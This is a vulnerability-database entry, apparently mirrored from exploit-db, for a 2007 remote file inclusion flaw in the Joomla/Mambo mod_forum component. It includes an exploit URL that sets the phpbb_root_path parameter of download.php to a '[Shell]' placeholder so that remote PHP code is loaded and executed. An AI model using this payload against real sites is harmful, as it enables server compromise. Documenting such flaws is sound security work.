Joomla! / Mambo Component Mod_Forum - 'PHPBB_Root.php' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056274 漏洞类型
发布时间 2007-06-22 更新时间 2007-06-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/30227
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/24591/info

The 'mod_forum' component for Joomla and Mambo is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to access the underlying system.

http://www.example.com/components/com_forum/download.php?phpbb_root_path=[Shell]